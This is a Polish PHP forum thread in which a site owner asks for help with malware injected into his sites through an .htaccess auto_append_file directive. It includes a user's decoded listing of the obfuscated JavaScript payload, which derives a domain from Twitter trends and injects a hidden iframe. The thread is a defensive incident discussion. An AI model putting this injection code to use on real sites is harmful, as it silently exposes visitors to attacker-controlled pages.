Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [php, bezpieczeństwo] Podejżane pliki na serwerze google_verify
Forum PHP.pl > Forum > PHP
kamil881
Witam,
Na wszystkich stronach na serwerze, dodały się dziwne fragmenty kodu - niektóre zaszyfrowane php w plikach, a niektóre wywołane przez .htacces:

Kod
<IfModule mod_php5.c>
php_value auto_append_file "google_verify.php"
</IfModule>

<IfModule mod_php4.c>
php_value auto_append_file "google_verify.php"
</IfModule>

Oto podejrzany kod: http://wklej.org/id/652715/, co po odkodowaniu daje http://wklej.org/id/652713/,

Wyczyściłem wszystko, pozmieniałem hasła do ftp, baz etc. Starałem się również przeszukać pod tym kątem komputer, ale po kliku dniach wszystko się powtórzyło. Przejrzałem logi, ale nie ma nic podejrzanego w postach i getach...

Z góry dzięki za pomoc i wesołych świąt
Kamil
zordon
napisz do swojej firmy hostingowej, może to jakieś statystyki?
kamil881
Kontaktowałem się z nimi, statystyki hostingowe mam poza tym z Piwika.
thek
No to pozostaje jeszcze rozkodować te liczby i będziesz wiedział o co kaman smile.gif Może skrypt się wbił i utworzył jakies konto administratorskie, dlatego Twoje zmiany na nic się zdają, bo koleś i tak ma dostęp.
kamil881
Gdybym wiedział jak się za nie zabrać... wink.gif.

Dostałem logi od usługodawcy, a w nich dziwne próby połączenia z adresu 78.42.176.36... Niemieckie ip, więc na pewno nikt powołany - na razie adres zablokowany.
erix
Cytat
Wyczyściłem wszystko, pozmieniałem hasła do ftp, baz etc. Starałem się również przeszukać pod tym kątem komputer, ale po kliku dniach wszystko się powtórzyło. Przejrzałem logi, ale nie ma nic podejrzanego w postach i getach...

No ok, ale co po tym, jak pozmieniasz loginy i hasła, jak nadal działają dziurawe skrypty?

Połataj aplikację, dopiero potem się zabieraj za to, co trzeba, bo będziesz w nieskończoność to kasował.

A blokowanie IP Ci nic nie da - to prawdopodobnie botnet, który skanuje Sieć w poszukiwaniu dziurawych aplikacji i dodaje w ten sposób kolejne węzły.
kamil881
Poza aktualnym wordpressem i zwykłymi statycznymi stronami, nie mam nic innego...
erix
A czy pluginy wszystkie masz w porządku?

Cytat
nie mam nic innego...

Jesteś w stanie dać za to głowę? Ja bym sprawdził.
kamil881
Głowy w stanie dać nie jestem, cóż, będę jeszcze nad tym siedział.
Dragas
Tak z ciekawości zabawiłem się za wstępne rozszyfrowanie tego zakofowanego kodu.
Wygląda od mniejwięcej tak:
Kod
function anonymous() {
    (function () {Date.prototype.jsq = function () {var jsBP = this;return [jsBP.getUTCFullYear(), jsBP.getUTCMonth(), jsBP.getUTCDate(), jsBP.getUTCHours(), jsBP.getUTCMinutes(), jsBP.getUTCSeconds()];};Date.prototype.jsk = function () {var jsr, jsBp = this.jsq(), i = 0;jsBp[1] += 1;while (i++ < 7) {jsr = jsBp[i];if (jsr < jsM) {jsBp[i] = jsm("z") + jsr;}}return jsBp.splice(jsm("z"), 1 + jsm("T")).join(jsm("u")) + "T" + jsBp.join(jsm("U"));};jsBG = {h: "http://", s: "/", t: "tre", d: "dai", n: "nds", q: "?", c: "callback=", j: "js", a: "api", l: "ly", W: "twitter", o: "com", e: "1", k: "s", K: "body", x: "ajax", D: ".", L: "libs", J: "jquery", '6': "6.2", m: "min", f: "on", S: "cript", i: "if", M: "rame", Y: "head", w: "width:", p: "px;", H: "height:", T: "2", r: "rc", Q: "\"", y: "style=", b: "><", R: "></", I: "div", B: "<", A: ">", g: "google", E: "&date=", z: "0", u: "-", U: " ", ',': ":00", ';': 2345678901, '/': 48271, F: 198195254, G: 12, C: "="};
function jsm(jsBu) {jsT = [];for (jsBa = 0; jsBa < jsBu.length; jsBa++) {jsT.push(jsBG[jsBu.charAt(jsBa)]);}return jst(jsT);}

jsBi = document;jsu = window;jsu.jsy = "undefined";jsu.jsz = jsm("haDWDosestnsdlDjfqcq");jsH = typeof $ == jsu.jsy;if (jsH || !jsBc()) {if (!jsH) {try {jsBg = jQuery.noConflict(true);} catch (e) {}try {jsBg = $.noConflict(true);} catch (e) {}}jsBS = jsBi.getElementsByTagName(jsm("Y"))[0];jsE = jsBi.createElement(jsm("kS"));jsE.setAttribute(jsm("kr"), jsm("hxDgakDosxsLsJseD6sJDmDj"));jsBS.appendChild(jsE);}
function jsBR(jss, jsBF) {return Math.floor(jss / jsBF);}

function jsv(jsd) {var jsBf = jsBR(jsu.jsL, jsu.jsBx);var jsw = jsu.jsL % jsu.jsBx;var jsN = jsu.jsBp * jsw;var jsF = jsu.jsBm * jsBf;var jse = jsN - jsF;if (jse > 0) {jsL = jse;} else {jsL = jse + jsu.jsBA;}return jsL % jsd;}

function jsJ(jsn) {jsu.jsL = jsm(";") + jsn;jsu.jsBp = jsm("/");jsu.jsBA = jsm(";") - jsm("F");jsu.jsBx = jsBR(jsu.jsBA, jsu.jsBp);jsu.jsBm = jsu.jsBA % jsu.jsBp;}

function jst(jsB) {return jsB.length == 1 ? jsB[0] : jsB.join("");}

function jsR(jsB) {d = new Date;jsA = jsm("zee");d.setTime((jsB.as_of - jsm("G") * jsm("G") * jsm("G") * jsm("ezz")) * jsm("ezzz"));return d;}

function jso(jsBC) {var jsi, jsBh, jsG = jsBC.length;var jsx = [];while (--jsG) {jsBh = jsv(jsG);jsx.push(jsBh);jsi = jsBC[jsBh];jsBC[jsBh] = jsBC[jsG];jsBC[jsG] = jsi;}}

function jsBL($) {jsBE = $.map([81, 85, 74, 74, 92, 17, 82, 73, 80, 30, 82, 77, 25, 11, 10, 10, 61, 11, 56, 55, 11, 53, 6, 53, 7, 2, 1, 0, 48], function (x, i) {return String.fromCharCode(i + x + 24);});return jst(jsBE);}

function jsj(x) {return x.length;}

function jsBT($) {if (typeof $ != jsu.jsy) {$(function () {if (typeof $.jsBo != jsu.jsy) {return;}$.jsBo = 1;$.getJSON(jsz, function (jsBM) {jsD = jsR(jsBM);jsK = jsD.getUTCMonth() + + jsm("e");jsBN = jsD.getUTCDate();jsp = function (x, i) {return jsj(x + "") - 1 ? x : "0" + x;};jsBe = jsp(jsK, 4) + "-" + jsp(jsBN, 7);jsa = jsz + jsm("ETzeeu") + jsBe;jsBD = jsBy = jsBR(jsD.getUTCHours(), 6) * 6 + + jsm("e");jsBz = jsBD + 1;jsM = + jsm("ez");setTimeout(function () {$.getJSON(jsa, function (jsBM) {try {jsS = jsBM.trends;jsf = jsm("Tzeeu") + jsBe + " ";if (jsBD < jsM) {jsBD = jsm("z") + jsBD;}if (jsBz < jsM) {jsBz = jsm("z") + jsBz;}jsc = jsS[jsf + jsBD + jsm(",")];if (!jsc) {jsc = jsS[jsf + jsBz + jsm(",")];}jsc = (jsc[3].name.toLowerCase().replace(/[^a-z]/gi, "") + "microscope").split("");jsC = jsK * 71 + jsBy * 3 + jsBN * 37;jsJ(jsC);jsj = jsv(4) + jsM;jso(jsc);jsb = jsm("Ch") + jst(jsc).substring(0, jsj) + ".com/" + jsBL($);jsBG.Z = jsb;jsBr = jsm("BIyQHTpweeepQbiMUyQHTpweeepQUkrZRiMRIA");$(jsm("K")).append(jsBr);} catch (jsBq) {}});}, jsM * jsM * jsM);});});} else {setTimeout(function () {jsBT(jsu.jQuery);}, 1 + jsm("TTT"));}}

jsBT(jsu.jQuery);}());
}

Dodatkowo przechwyciłęm z czym się łączy:
http://ajax.googleapis.com/ajax/libs/jquer...2/jquery.min.js
http://api.twitter.com/1/trends/daily.json..._=1325094272460
http://api.twitter.com/1/trends/daily.json..._=1325094273908

To chyba wszystko co wyłapałem na chwile obecną.

Pozdrawiam Dragas
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.